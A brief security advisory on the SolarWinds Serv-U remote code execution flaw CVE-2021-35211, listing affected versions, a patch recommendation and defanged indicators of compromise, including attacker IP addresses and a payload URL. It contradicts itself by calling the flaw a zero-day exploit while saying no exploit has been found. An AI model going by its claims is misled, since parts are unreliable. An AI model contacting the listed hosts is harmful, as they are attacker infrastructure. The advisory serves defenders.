SolarWinds Serv-U Remote Code Execution Vulnerability (Zero-Day Exploit)

SolarWinds Serv-U Remote Code Execution Vulnerability (Zero-Day Exploit)

Microsoft stated that it discovered a remote code execution (RCE) vulnerability (with a CVSS 3.1 score of 10.0) in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability.

This is a zero-day vulnerability and if exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. Even though no exploit regarding this vulnerability has been discovered, due to its severity/criticality, it is highly recommended that the following patches are downloaded to ensure the safety of systems/assets.

Affected Systems

The following servers/systems are affected by this vulnerability;

• SolarWinds Serv-U Managed File Transfer
• Serv-U Secure FTP for Windows before 15.2.3 HF2

IoC’s

• 98[.]176[.]196[.]89
• 68[.]235[.]178[.]32
• 208[.]113[.]35[.]58
• 144[.]34[.]179[.]162
• 97[.]77[.]97[.]58
• hxxp://144[.]34[.]179[.]162/a
• C:\Windows\Temp\Serv-U.bat
• C:\Windows\Temp\test\current.dmp

Recommended Solution(s)

Organizations are recommended to update their instances of Serv-U to the latest available version.

CVE / CWE

CVE-2021-35211

Related Website(s)

• https://nvd.nist.gov/vuln/detail/CVE-2021-35211
• https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
• https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211

* Vulnerabilities with a CVSS 3.1 score between 7.0 and 8.9 are evaluated to be “high” whereas vulnerabilities with a CVSS 3.1 score between 9.0 and 10.0 are evaluated to be “critical”.